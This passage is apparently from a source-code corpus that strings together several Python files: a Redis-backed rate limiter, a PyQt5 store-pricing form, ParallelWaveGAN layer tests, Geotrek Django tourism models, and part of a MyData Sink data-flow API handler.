allowed - remaining_tokens: remaining_tokens for this rule's period """ rk_tokens = 'rlim::%s::tokens::%s::r%s' % (self.namespace, self.identifier, rule.to_string()) rk_last_ts = 'rlim::%s::last_ts::%s::r%s' % (self.namespace, self.identifier, rule.to_string()) rule_ttl_seconds = rule.period_seconds + 10 try: rv_last_ts = float(self.redisdb.get(rk_last_ts)) rv_tokens = float(self.redisdb.get(rk_tokens)) except Exception: # Inintilize values if not exists rv_last_ts = time.time() rv_tokens = rule.tokens self.redisdb.set(rk_tokens, rv_tokens, ex=rule_ttl_seconds) self.redisdb.set(rk_last_ts, '%.3f' % rv_last_ts, ex=rule_ttl_seconds) # Add fresh tokens since last timestamp with self.redisdb.pipeline() as pipe: pipe.watch(rk_last_ts) # Float precision may cause this value negative # Add token by passed time senconds_passed = max(time.time() - rv_last_ts, 0) fresh_tokens = rule.fresh_tokens_by_seconds(senconds_passed) remaining_tokens = rv_tokens # Only add fresh token when it's greater than 1 # Passed time maybe less than 1, fresh_token more than 1 if fresh_tokens >= 1 and remaining_tokens < rule.tokens: # Never add let tokens more than rule.tokens fresh_tokens = min(fresh_tokens, rule.tokens - remaining_tokens) pipe.multi() pipe.incrbyfloat(rk_tokens, fresh_tokens) pipe.expire(rk_tokens, rule_ttl_seconds) pipe.set(rk_last_ts, '%.3f' % time.time(), ex=rule_ttl_seconds) # Ignore WatchError try: pipe.execute() except WatchError: pass # Remove tokens, if tokens to consume are bigger than remaining tokens, do nothing # and return Flase remaining_tokens = self.redisdb.incrbyfloat(rk_tokens, -tokens) over_limit = False if remaining_tokens < 0: remaining_tokens = self.redisdb.incrbyfloat(rk_tokens, tokens) over_limit = True return { 'allowed': not over_limit, 'remaining_tokens': max(remaining_tokens, 0) } class SimpleLimiter(BaseRateLimiter): def prepare(self): self.simple_incr = self.redisdb.register_script('''\ local current current = redis.call("incr", KEYS[1]) if tonumber(current) == 1 then redis.call("expire", KEYS[1], ARGV[1]) end return current''') def acquire_by_single_rule(self, rule, tokens=1): """Acquire an request quota from limiter :param rule: `Rule` object :param int tokens: tokens to be consumed, default 1 :returns: a dict of `allowed` and `remaining_tokens` - allowed: wheather this request is allowed - remaining_tokens: remaining_tokens for this rule's period """ # TODO: Should we use ( current timestamp / period_seconds ) as part of the redis key? rk_counter = 'rlim::%s::scounter::%s::r%s' % (self.namespace, self.identifier, rule.to_string()) old_cnt = self.redisdb.get(rk_counter) if old_cnt is not None and int(old_cnt) >= rule.tokens: return { 'allowed': False, 'remaining_tokens': 0.0 } new_cnt = self.simple_incr(keys=[rk_counter], args=[rule.period_seconds]) return { 'allowed': True, 'remaining_tokens': max(0, rule.tokens - new_cnt) } class Rule(object): """Rule class for RateLimiter""" time_unit_to_seconds = { 'second': 1, 'minute': 60, 'hour': 3600, 'day': 3600 * 24, } @classmethod def period_to_seonds(cls, period): for unit, seconds in cls.time_unit_to_seconds.items(): if unit in period: period_seconds = period[unit] * seconds break else: raise ValueError(('Invalid period %s given, should be ' '{"second/minute/hour/day": NUMBER}') % period) return period_seconds def __init__(self, tokens, period_seconds): self.tokens = tokens # Precision of seconds only to second self.period_seconds = int(period_seconds) if tokens < 0: logger.warn('Will not allow any acquire because given tokens < 0') def to_string(self): return "%s_%s" % (self.tokens, self.period_seconds) def fresh_tokens_by_seconds(self, seconds): return int(self.rate_per_seconds * seconds) @property def rate_per_seconds(self): return self.tokens / float(self.period_seconds) def __repr__(self): return '<Rule %s>' % self.to_string()
2.140625
2
tela_cadastro_loja_embala.py
lucasHashi/PyQt5-gerenciador-de-vendas-de-comidas
1
11078
<reponame>lucasHashi/PyQt5-gerenciador-de-vendas-de-comidas import sys from PyQt5 import QtCore, QtGui, QtWidgets, uic import database_receita import pyqt5_aux qt_tela_inicial = "telas/tela_cadastro_loja_embala.ui" Ui_MainWindow, QtBaseClass = uic.loadUiType(qt_tela_inicial) class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow): switch_tela_gerenciar_loja_embala = QtCore.pyqtSignal(int, int, float, str, str, int, str, float, str) def __init__(self): QtWidgets.QMainWindow.__init__(self) Ui_MainWindow.__init__(self) self.setupUi(self) #CONFIG BOTOES self.btn_cadastrar.pressed.connect(self.cadastrar_loja_embala) self.btn_limpar.pressed.connect(self.limpar_loja_embala) self.btn_ativa_loja.pressed.connect(self.ativar_loja) self.btn_sair.pressed.connect(self.fechar_tela) #CARREGAR COMBO INGREDIENTES self.carrega_ingredientes() #QUANDO UM INGREDIENTE FOR SELECIONADO NA COMBO self.combo_ingrediente.currentIndexChanged.connect(self.ingrediente_selecionado) #QUANDO UMA EMBALAGEM FOR DOUBLE-CLICADA self.list_embalagens.itemDoubleClicked.connect(self.embalagem_selecionada) #QUANDO SELECIONAR UMA LOJA, COLOCAR NO TXT_LOJA self.carrega_lojas() self.combo_loja.currentIndexChanged.connect(self.loja_selecionada) #QUANDO UM CADASTRADO FOR DOUBLE-CLICADO self.tb_loja_embala_cadastrados.cellDoubleClicked.connect(self.loja_embala_selecionado) #ATUALIZA A TABLE LOJA_EMBALA #self.carrega_loja_embala() header = self.tb_loja_embala_cadastrados.horizontalHeader() self.tb_loja_embala_cadastrados.setHorizontalHeaderLabels(['Codigo', 'Tamanho', 'Unidade', 'Marca', 'Loja', 'Preço']) #header.setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents) header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents) header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents) header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents) header.setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents) header.setSectionResizeMode(5, QtWidgets.QHeaderView.ResizeToContents) def carrega_loja_embala(self, id_ingrediente): lista_dados = database_receita.select_loja_embala_por_ingrediente_lista(id_ingrediente) pyqt5_aux.carregar_dados_table_widget(self.tb_loja_embala_cadastrados, lista_dados) def embalagem_selecionada(self, item): self.combo_loja.setEnabled(True) self.btn_ativa_loja.setEnabled(True) self.btn_cadastrar.setEnabled(True) self.btn_limpar.setEnabled(True) self.double_preco.setEnabled(True) self.txt_embalagem.setText(str(item.text())) def loja_selecionada(self, item): try: _, nome = str(self.combo_loja.currentText()).split(' - ') self.txt_loja.setText(nome) except: self.txt_loja.clear() def ingrediente_selecionado(self, item): try: id_ingrediente = str(self.combo_ingrediente.currentText()).split(' - ')[0] self.carrega_embalagens(id_ingrediente) self.list_embalagens.setEnabled(True) self.carrega_loja_embala(id_ingrediente) except: self.list_embalagens.setEnabled(False) def carrega_ingredientes(self): lista_ingredientes = ['Ingredientes cadastrados'] lista_ingredientes += database_receita.select_ingredientes_nomes() self.combo_ingrediente.addItems(lista_ingredientes) def cadastrar_loja_embala(self): try: id_loja, nome_loja = self.combo_loja.currentText().split(' - ') except ValueError: id_loja, nome_loja = 0, self.txt_loja.text() #CADASTRA LOJA SE FOR NOVA if(self.txt_loja.isEnabled()): id_loja = database_receita.insere_loja(nome_loja) #PEGAR OS DADOS: ID_LOJA, ID_EMBALAGEM, PRECO id_embalagem = int(str(self.txt_embalagem.text()).split(' - ')[0]) preco = self.double_preco.value() #CADASTRA LOJA_EMBALA database_receita.insere_loja_embala(preco, id_loja, id_embalagem) #ATUALIZA A TABLE LOJA_EMBALA id_ingrediente = self.combo_ingrediente.currentText().split(' - ')[0] self.carrega_loja_embala(id_ingrediente) #LIMPA: LOJA, PRECO, TXT_EMBALAGEM self.txt_loja.clear() self.txt_loja.setEnabled(False) self.btn_ativa_loja.setText('+') self.btn_ativa_loja.setEnabled(False) self.carrega_lojas() self.double_preco.clear() self.double_preco.setEnabled(False) self.txt_embalagem.clear() #DESATIVA BOTOES: CADASTRAR, LIMPAR self.btn_cadastrar.setEnabled(False) self.btn_limpar.setEnabled(False) def carrega_embalagens(self, id_ingrediente): self.list_embalagens.clear() lista_embalagens = database_receita.select_embalagens_por_ingrediente_nomes(id_ingrediente) self.list_embalagens.addItems(lista_embalagens) def carrega_lojas(self): self.combo_loja.clear() lista_lojas = ['Lojas cadastradas'] lista_lojas += database_receita.select_lojas_nomes() self.combo_loja.addItems(lista_lojas) def ativar_loja(self): if(self.txt_loja.isEnabled()): self.txt_loja.clear() self.txt_loja.setEnabled(False) self.btn_ativa_loja.setText('+') self.combo_loja.setEnabled(True) else: self.txt_loja.setEnabled(True) self.btn_ativa_loja.setText('-') self.combo_loja.setEnabled(False) def limpar_loja_embala(self): #LIMPA: LOJA, PRECO, TXT_EMBALAGEM self.txt_loja.clear() self.txt_loja.setEnabled(False) self.btn_ativa_loja.setText('+') self.btn_ativa_loja.setEnabled(False) self.carrega_lojas() self.double_preco.clear() self.double_preco.setEnabled(False) def loja_embala_selecionado(self, linha, coluna): id_loja_embala = self.tb_loja_embala_cadastrados.item(linha, 0).text() _, _, id_loja, id_embalagem = database_receita.select_loja_embala_por_id(id_loja_embala) tamanho = self.tb_loja_embala_cadastrados.item(linha, 1).text() unidade = self.tb_loja_embala_cadastrados.item(linha, 2).text() marca = self.tb_loja_embala_cadastrados.item(linha, 3).text() nome_loja = self.tb_loja_embala_cadastrados.item(linha, 4).text() preco = self.tb_loja_embala_cadastrados.item(linha, 5).text() ingrediente = self.combo_ingrediente.currentText().split(' - ')[1] print(id_loja_embala, id_embalagem, tamanho, unidade, marca, id_loja, nome_loja, preco, ingrediente) self.switch_tela_gerenciar_loja_embala.emit(int(id_loja_embala), int(id_embalagem), float(tamanho), unidade, marca, int(id_loja), nome_loja, float(preco), ingrediente) def fechar_tela(self): self.close()
2.46875
2
test/test_layers.py
mukeshv0/ParallelWaveGAN
0
11079
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright 2019 <NAME> # MIT License (https://opensource.org/licenses/MIT) import logging import numpy as np import torch from parallel_wavegan.layers import Conv1d from parallel_wavegan.layers import Conv1d1x1 from parallel_wavegan.layers import Conv2d from parallel_wavegan.layers import ConvInUpsampleNetwork from parallel_wavegan.layers import UpsampleNetwork logging.basicConfig( level=logging.DEBUG, format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s") def test_conv_initialization(): conv = Conv1d(10, 10, 3, bias=True) np.testing.assert_array_equal(conv.bias.data.numpy(), np.zeros_like(conv.bias.data.numpy())) conv1x1 = Conv1d1x1(10, 10, bias=True) np.testing.assert_array_equal(conv1x1.bias.data.numpy(), np.zeros_like(conv1x1.bias.data.numpy())) kernel_size = (10, 10) conv2d = Conv2d(10, 10, kernel_size, bias=True) np.testing.assert_array_equal(conv2d.weight.data.numpy(), np.ones_like(conv2d.weight.data.numpy()) / np.prod(kernel_size)) np.testing.assert_array_equal(conv2d.bias.data.numpy(), np.zeros_like(conv2d.bias.data.numpy())) kernel_size = (1, 10) conv2d = Conv2d(10, 10, kernel_size, bias=True) np.testing.assert_array_equal(conv2d.weight.data.numpy(), np.ones_like(conv2d.weight.data.numpy()) / np.prod(kernel_size)) np.testing.assert_array_equal(conv2d.bias.data.numpy(), np.zeros_like(conv2d.bias.data.numpy())) def test_upsample(): length = 10 scales = [4, 4] x = torch.randn(1, 10, length) upsample = UpsampleNetwork(scales) y = upsample(x) assert x.size(-1) * np.prod(scales) == y.size(-1) for aux_context_window in [0, 1, 2, 3]: conv_upsample = ConvInUpsampleNetwork(scales, aux_channels=x.size(1), aux_context_window=aux_context_window) y = conv_upsample(x) assert (x.size(-1) - 2 * aux_context_window) * np.prod(scales) == y.size(-1)
2.15625
2
geotrek/tourism/models.py
ker2x/Geotrek-admin
0
11080
<gh_stars>0 import os import re import logging from django.conf import settings from django.contrib.gis.db import models from django.utils.translation import ugettext_lazy as _ from django.utils.formats import date_format from easy_thumbnails.alias import aliases from easy_thumbnails.exceptions import InvalidImageFormatError from easy_thumbnails.files import get_thumbnailer from mapentity.registry import registry from mapentity.models import MapEntityMixin from mapentity.serializers import plain_text, smart_plain_text from geotrek.authent.models import StructureRelated from geotrek.core.models import Topology from geotrek.common.mixins import (NoDeleteMixin, TimeStampedModelMixin, PictogramMixin, OptionalPictogramMixin, PublishableMixin, PicturesMixin, AddPropertyMixin) from geotrek.common.models import Theme from geotrek.common.utils import intersecting from extended_choices import Choices if 'modeltranslation' in settings.INSTALLED_APPS: from modeltranslation.manager import MultilingualManager else: from django.db.models import Manager as MultilingualManager logger = logging.getLogger(__name__) def _get_target_choices(): """ Populate choices using installed apps names. """ apps = [('public', _("Public website"))] for model, entity in registry.registry.items(): if entity.menu: appname = model._meta.app_label.lower() apps.append((appname, unicode(entity.label))) return tuple(apps) class InformationDeskType(PictogramMixin): label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='label') class Meta: db_table = 't_b_type_renseignement' verbose_name = _(u"Information desk type") verbose_name_plural = _(u"Information desk types") ordering = ['label'] def __unicode__(self): return self.label class InformationDesk(models.Model): name = models.CharField(verbose_name=_(u"Title"), max_length=256, db_column='nom') type = models.ForeignKey(InformationDeskType, verbose_name=_(u"Type"), related_name='desks', db_column='type') description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description', help_text=_(u"Brief description")) phone = models.CharField(verbose_name=_(u"Phone"), max_length=32, blank=True, null=True, db_column='telephone') email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email', blank=True, null=True) website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website', blank=True, null=True) photo = models.FileField(verbose_name=_(u"Photo"), upload_to=settings.UPLOAD_DIR, db_column='photo', max_length=512, blank=True, null=True) street = models.CharField(verbose_name=_(u"Street"), max_length=256, blank=True, null=True, db_column='rue') postal_code = models.CharField(verbose_name=_(u"Postal code"), max_length=8, blank=True, null=True, db_column='code') municipality = models.CharField(verbose_name=_(u"Municipality"), blank=True, null=True, max_length=256, db_column='commune') geom = models.PointField(verbose_name=_(u"Emplacement"), db_column='geom', blank=True, null=True, srid=settings.SRID, spatial_index=False) objects = models.GeoManager() class Meta: db_table = 't_b_renseignement' verbose_name = _(u"Information desk") verbose_name_plural = _(u"Information desks") ordering = ['name'] def __unicode__(self): return self.name @property def description_strip(self): """Used in trek public template. """ nobr = re.compile(r'(\s*<br.*?>)+\s*', re.I) newlines = nobr.sub("\n", self.description) return smart_plain_text(newlines) @property def serializable_type(self): return { 'id': self.type.id, 'label': self.type.label, 'pictogram': self.type.pictogram.url, } @property def latitude(self): if self.geom: api_geom = self.geom.transform(settings.API_SRID, clone=True) return api_geom.y return None @property def longitude(self): if self.geom: api_geom = self.geom.transform(settings.API_SRID, clone=True) return api_geom.x return None @property def thumbnail(self): if not self.photo: return None thumbnailer = get_thumbnailer(self.photo) try: return thumbnailer.get_thumbnail(aliases.get('thumbnail')) except InvalidImageFormatError: logger.warning(_("Image %s invalid or missing from disk.") % self.photo) return None @property def photo_url(self): thumbnail = self.thumbnail if not thumbnail: return None return os.path.join(settings.MEDIA_URL, thumbnail.name) GEOMETRY_TYPES = Choices( ('POINT', 'point', _('Point')), ('LINE', 'line', _('Line')), ('POLYGON', 'polygon', _('Polygon')), ('ANY', 'any', _('Any')), ) class TouristicContentCategory(PictogramMixin): label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='nom') geometry_type = models.CharField(db_column="type_geometrie", max_length=16, choices=GEOMETRY_TYPES, default=GEOMETRY_TYPES.POINT) type1_label = models.CharField(verbose_name=_(u"First list label"), max_length=128, db_column='label_type1', blank=True) type2_label = models.CharField(verbose_name=_(u"Second list label"), max_length=128, db_column='label_type2', blank=True) order = models.IntegerField(verbose_name=_(u"Order"), null=True, blank=True, db_column='tri', help_text=_(u"Alphabetical order if blank")) id_prefix = 'C' class Meta: db_table = 't_b_contenu_touristique_categorie' verbose_name = _(u"Touristic content category") verbose_name_plural = _(u"Touristic content categories") ordering = ['order', 'label'] def __unicode__(self): return self.label @property def prefixed_id(self): return '{prefix}{id}'.format(prefix=self.id_prefix, id=self.id) class TouristicContentType(OptionalPictogramMixin): label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='nom') category = models.ForeignKey(TouristicContentCategory, related_name='types', verbose_name=_(u"Category"), db_column='categorie') # Choose in which list of choices this type will appear in_list = models.IntegerField(choices=((1, _(u"First")), (2, _(u"Second"))), db_column='liste_choix') class Meta: db_table = 't_b_contenu_touristique_type' verbose_name = _(u"Touristic content type") verbose_name_plural = _(u"Touristic content type") ordering = ['label'] def __unicode__(self): return self.label class TouristicContentType1Manager(MultilingualManager): def get_queryset(self): return super(TouristicContentType1Manager, self).get_queryset().filter(in_list=1) class TouristicContentType2Manager(MultilingualManager): def get_queryset(self): return super(TouristicContentType2Manager, self).get_queryset().filter(in_list=2) class TouristicContentType1(TouristicContentType): objects = TouristicContentType1Manager() def __init__(self, *args, **kwargs): self._meta.get_field('in_list').default = 1 super(TouristicContentType1, self).__init__(*args, **kwargs) class Meta: proxy = True verbose_name = _(u"Type") verbose_name_plural = _(u"First list types") class TouristicContentType2(TouristicContentType): objects = TouristicContentType2Manager() def __init__(self, *args, **kwargs): self._meta.get_field('in_list').default = 2 super(TouristicContentType2, self).__init__(*args, **kwargs) class Meta: proxy = True verbose_name = _(u"Type") verbose_name_plural = _(u"Second list types") class ReservationSystem(models.Model): name = models.CharField(verbose_name=_(u"Name"), max_length=256, blank=False, null=False, unique=True) def __unicode__(self): return self.name class Meta: db_table = 't_b_systeme_reservation' verbose_name = _(u"Reservation system") verbose_name_plural = _(u"Reservation systems") class TouristicContent(AddPropertyMixin, PublishableMixin, MapEntityMixin, StructureRelated, TimeStampedModelMixin, PicturesMixin, NoDeleteMixin): """ A generic touristic content (accomodation, museum, etc.) in the park """ description_teaser = models.TextField(verbose_name=_(u"Description teaser"), blank=True, help_text=_(u"A brief summary"), db_column='chapeau') description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description', help_text=_(u"Complete description")) themes = models.ManyToManyField(Theme, related_name="touristiccontents", db_table="t_r_contenu_touristique_theme", blank=True, verbose_name=_(u"Themes"), help_text=_(u"Main theme(s)")) geom = models.GeometryField(verbose_name=_(u"Location"), srid=settings.SRID) category = models.ForeignKey(TouristicContentCategory, related_name='contents', verbose_name=_(u"Category"), db_column='categorie') contact = models.TextField(verbose_name=_(u"Contact"), blank=True, db_column='contact', help_text=_(u"Address, phone, etc.")) email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email', blank=True, null=True) website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website', blank=True, null=True) practical_info = models.TextField(verbose_name=_(u"Practical info"), blank=True, db_column='infos_pratiques', help_text=_(u"Anything worth to know")) type1 = models.ManyToManyField(TouristicContentType, related_name='contents1', verbose_name=_(u"Type 1"), db_table="t_r_contenu_touristique_type1", blank=True) type2 = models.ManyToManyField(TouristicContentType, related_name='contents2', verbose_name=_(u"Type 2"), db_table="t_r_contenu_touristique_type2", blank=True) source = models.ManyToManyField('common.RecordSource', blank=True, related_name='touristiccontents', verbose_name=_("Source"), db_table='t_r_contenu_touristique_source') portal = models.ManyToManyField('common.TargetPortal', blank=True, related_name='touristiccontents', verbose_name=_("Portal"), db_table='t_r_contenu_touristique_portal') eid = models.CharField(verbose_name=_(u"External id"), max_length=1024, blank=True, null=True, db_column='id_externe') reservation_system = models.ForeignKey(ReservationSystem, verbose_name=_(u"Reservation system"), blank=True, null=True) reservation_id = models.CharField(verbose_name=_(u"Reservation ID"), max_length=1024, blank=True, db_column='id_reservation') approved = models.BooleanField(verbose_name=_(u"Approved"), default=False, db_column='labellise') objects = NoDeleteMixin.get_manager_cls(models.GeoManager)() class Meta: db_table = 't_t_contenu_touristique' verbose_name = _(u"Touristic content") verbose_name_plural = _(u"Touristic contents") def __unicode__(self): return self.name @property def districts_display(self): return ', '.join([unicode(d) for d in self.districts]) @property def type1_label(self): return self.category.type1_label @property def type2_label(self): return self.category.type2_label @property def type1_display(self): return ', '.join([unicode(n) for n in self.type1.all()]) @property def type2_display(self): return ', '.join([unicode(n) for n in self.type2.all()]) @property def prefixed_category_id(self): return self.category.prefixed_id def distance(self, to_cls): return settings.TOURISM_INTERSECTION_MARGIN @property def type(self): """Fake type to simulate POI for mobile app v1""" return self.category @property def min_elevation(self): return 0 @property def max_elevation(self): return 0 @property def portal_display(self): return ', '.join([unicode(portal) for portal in self.portal.all()]) @property def source_display(self): return ','.join([unicode(source) for source in self.source.all()]) @property def themes_display(self): return ','.join([unicode(source) for source in self.themes.all()]) @property def extent(self): return self.geom.buffer(10).transform(settings.API_SRID, clone=True).extent @property def rando_url(self): category_slug = _(u'touristic-content') return '{}/{}/'.format(category_slug, self.slug) @property def meta_description(self): return plain_text(self.description_teaser or self.description)[:500] Topology.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents")) Topology.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents")) TouristicContent.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents")) TouristicContent.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents")) class TouristicEventType(OptionalPictogramMixin): type = models.CharField(verbose_name=_(u"Type"), max_length=128, db_column='type') class Meta: db_table = 't_b_evenement_touristique_type' verbose_name = _(u"Touristic event type") verbose_name_plural = _(u"Touristic event types") ordering = ['type'] def __unicode__(self): return self.type class TouristicEvent(AddPropertyMixin, PublishableMixin, MapEntityMixin, StructureRelated, PicturesMixin, TimeStampedModelMixin, NoDeleteMixin): """ A touristic event (conference, workshop, etc.) in the park """ description_teaser = models.TextField(verbose_name=_(u"Description teaser"), blank=True, help_text=_(u"A brief summary"), db_column='chapeau') description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description', help_text=_(u"Complete description")) themes = models.ManyToManyField(Theme, related_name="touristic_events", db_table="t_r_evenement_touristique_theme", blank=True, verbose_name=_(u"Themes"), help_text=_(u"Main theme(s)")) geom = models.PointField(verbose_name=_(u"Location"), srid=settings.SRID) begin_date = models.DateField(blank=True, null=True, verbose_name=_(u"Begin date"), db_column='date_debut') end_date = models.DateField(blank=True, null=True, verbose_name=_(u"End date"), db_column='date_fin') duration = models.CharField(verbose_name=_(u"Duration"), max_length=64, blank=True, db_column='duree', help_text=_(u"3 days, season, ...")) meeting_point = models.CharField(verbose_name=_(u"Meeting point"), max_length=256, blank=True, db_column='point_rdv', help_text=_(u"Where exactly ?")) meeting_time = models.TimeField(verbose_name=_(u"Meeting time"), blank=True, null=True, db_column='heure_rdv', help_text=_(u"11:00, 23:30")) contact = models.TextField(verbose_name=_(u"Contact"), blank=True, db_column='contact') email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email', blank=True, null=True) website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website', blank=True, null=True) organizer = models.CharField(verbose_name=_(u"Organizer"), max_length=256, blank=True, db_column='organisateur') speaker = models.CharField(verbose_name=_(u"Speaker"), max_length=256, blank=True, db_column='intervenant') type = models.ForeignKey(TouristicEventType, verbose_name=_(u"Type"), blank=True, null=True, db_column='type') accessibility = models.CharField(verbose_name=_(u"Accessibility"), max_length=256, blank=True, db_column='accessibilite') participant_number = models.CharField(verbose_name=_(u"Number of participants"), max_length=256, blank=True, db_column='nb_places') booking = models.TextField(verbose_name=_(u"Booking"), blank=True, db_column='reservation') target_audience = models.CharField(verbose_name=_(u"Target audience"), max_length=128, blank=True, null=True, db_column='public_vise') practical_info = models.TextField(verbose_name=_(u"Practical info"), blank=True, db_column='infos_pratiques', help_text=_(u"Recommandations / To plan / Advices")) source = models.ManyToManyField('common.RecordSource', blank=True, related_name='touristicevents', verbose_name=_("Source"), db_table='t_r_evenement_touristique_source') portal = models.ManyToManyField('common.TargetPortal', blank=True, related_name='touristicevents', verbose_name=_("Portal"), db_table='t_r_evenement_touristique_portal') eid = models.CharField(verbose_name=_(u"External id"), max_length=1024, blank=True, null=True, db_column='id_externe') approved = models.BooleanField(verbose_name=_(u"Approved"), default=False, db_column='labellise') objects = NoDeleteMixin.get_manager_cls(models.GeoManager)() category_id_prefix = 'E' class Meta: db_table = 't_t_evenement_touristique' verbose_name = _(u"Touristic event") verbose_name_plural = _(u"Touristic events") ordering = ['-begin_date'] def __unicode__(self): return self.name @property def type1(self): return [self.type] if self.type else [] @property def type2(self): return [] @property def districts_display(self): return ', '.join([unicode(d) for d in self.districts]) @property def dates_display(self): if not self.begin_date and not self.end_date: return u"" elif not self.end_date: return _(u"starting from {begin}").format( begin=date_format(self.begin_date, 'SHORT_DATE_FORMAT')) elif not self.begin_date: return _(u"up to {end}").format( end=date_format(self.end_date, 'SHORT_DATE_FORMAT')) elif self.begin_date == self.end_date: return date_format(self.begin_date, 'SHORT_DATE_FORMAT') else: return _(u"from {begin} to {end}").format( begin=date_format(self.begin_date, 'SHORT_DATE_FORMAT'), end=date_format(self.end_date, 'SHORT_DATE_FORMAT')) @property def prefixed_category_id(self): return self.category_id_prefix def distance(self, to_cls): return settings.TOURISM_INTERSECTION_MARGIN @property def portal_display(self): return ', '.join([unicode(portal) for portal in self.portal.all()]) @property def source_display(self): return ', '.join([unicode(source) for source in self.source.all()]) @property def themes_display(self): return ','.join([unicode(source) for source in self.themes.all()]) @property def rando_url(self): category_slug = _(u'touristic-event') return '{}/{}/'.format(category_slug, self.slug) @property def meta_description(self): return plain_text(self.description_teaser or self.description)[:500] TouristicEvent.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents")) TouristicEvent.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents")) Topology.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events")) Topology.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events")) TouristicContent.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events")) TouristicContent.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events")) TouristicEvent.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events")) TouristicEvent.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events"))
1.820313
2
Service_Components/Sink/Sink_DataFlow.py
mydata-sdk/mydata-sdk-1.x
0
11081
<filename>Service_Components/Sink/Sink_DataFlow.py # -*- coding: utf-8 -*- from signed_requests.signed_request_auth import SignedRequest __author__ = 'alpaloma' from flask import Blueprint, current_app, request from helpers import Helpers import requests from json import dumps, loads from DetailedHTTPException import error_handler from flask_restful import Resource, Api import logging from jwcrypto import jwk from Templates import Sequences debug_log = logging.getLogger("debug") logger = logging.getLogger("sequence") api_Sink_blueprint = Blueprint("api_Sink_blueprint", __name__) api = Api() api.init_app(api_Sink_blueprint) sq = Sequences("Service_Components Mgmnt (Sink)", {}) # import xmltodict # @api.representation('application/xml') # def output_xml(data, code, headers=None): # if isinstance(data, dict): # xm = {"response": data} # resp = make_response(xmltodict.unparse(xm, pretty=True), code) # resp.headers.extend(headers) # return resp class Status(Resource): @error_handler def get(self): status = {"status": "running", "service_mode": "Sink"} return status class DataFlow(Resource): def __init__(self): super(DataFlow, self).__init__() self.service_url = current_app.config["SERVICE_URL"] self.operator_url = current_app.config["OPERATOR_URL"] self.helpers = Helpers(current_app.config) @error_handler def post(self): # TODO Make this a GET def renew_token(operator_url, record_id): sq.task("Renewing Auth Token.") token = requests.get( "{}/api/1.2/cr/auth_token/{}".format(operator_url, record_id)) # TODO Get api path from some config? debug_log.info("{}, {}, {}, {}".format(token.url, token.reason, token.status_code, token.text)) store_dict = {cr_id: dumps(loads(token.text.encode()))} self.helpers.storeToken(store_dict) def step_1(): params = request.json debug_log.info(params) debug_log.info(request.json) user_id = params["user_id"] cr_id = params["cr_id"] rs_id = params["rs_id"] sq.task("Get data_set_id from POST json") data_set_id = request.args.get("dataset_id", None) debug_log.info("data_set_id is ({}), cr_id is ({}), user_id ({}) and rs_id ({})" .format(data_set_id, cr_id, user_id, rs_id)) sq.task("Create request") req = {"we want": "data"} sq.task("Validate CR") cr = self.helpers.validate_cr(cr_id, surrogate_id=user_id) sq.task("Validate Request from UI") distribution_urls = self.helpers.validate_request_from_ui(cr, data_set_id, rs_id) # Fetch data request urls # Data request urls fetched. debug_log.info("Data request urls fetched.") return cr_id, cr, distribution_urls cr_id, cr, distribution_urls = step_1() sq.task("Validate Authorisation Token") surrogate_id = cr["cr"]["common_part"]["surrogate_id"] our_key = self.helpers.get_key() our_key_pub = our_key["pub"] tries = 3 # TODO: Get this from config while True: try: aud = self.helpers.validate_authorization_token(cr_id, surrogate_id, our_key_pub) break except ValueError as e: debug_log.exception(e) renew_token(self.operator_url, cr_id) if tries == 0: raise EnvironmentError("Auth token validation failed and retry counter exceeded.") tries -= 1 except TypeError as e: debug_log.exception(e) raise EnvironmentError("Token used too soon, halting.") # Most verifying and checking below is done in the validate_authorization_token function by jwcrypto # Fetch Authorisation Token related to CR from data storage by rs_id (cr_id?) # Check Integrity ( Signed by operator, Operator's public key can be found from SLR) # Check "Issued" timestamp # Check "Not Before" timestamp # Check "Not After" timestamp # Check that "sub" contains correct public key(Our key.) # OPT: Token expired # Get new Authorization token, start again from validation. # TODO: Make these steps work as functions that call the next step. # Check URL patterns in "aud" field # Check that fetched distribution urls can be found from "aud" field # Token validated debug_log.info("Auth Token Validated.") # With these two steps Sink has verified that it's allowed to make request. # Construct request sq.task("Construct request") # Select request URL from "aud" field # Add Authorisation Token to request # Request constructed. # Sign request # Fetch private key pair of public key specified in Authorisation Token's "sub" field. # Sign with fetched private key sq.task("Fetch key used to sign request") our_key_full = jwk.JWK() our_key_full.import_key(**our_key["key"]) # Add signature to request # Request signed. # Request created. sq.send_to("Service_Components Mgmnt (Source)", "Data Request (PoP stuff)") # Make 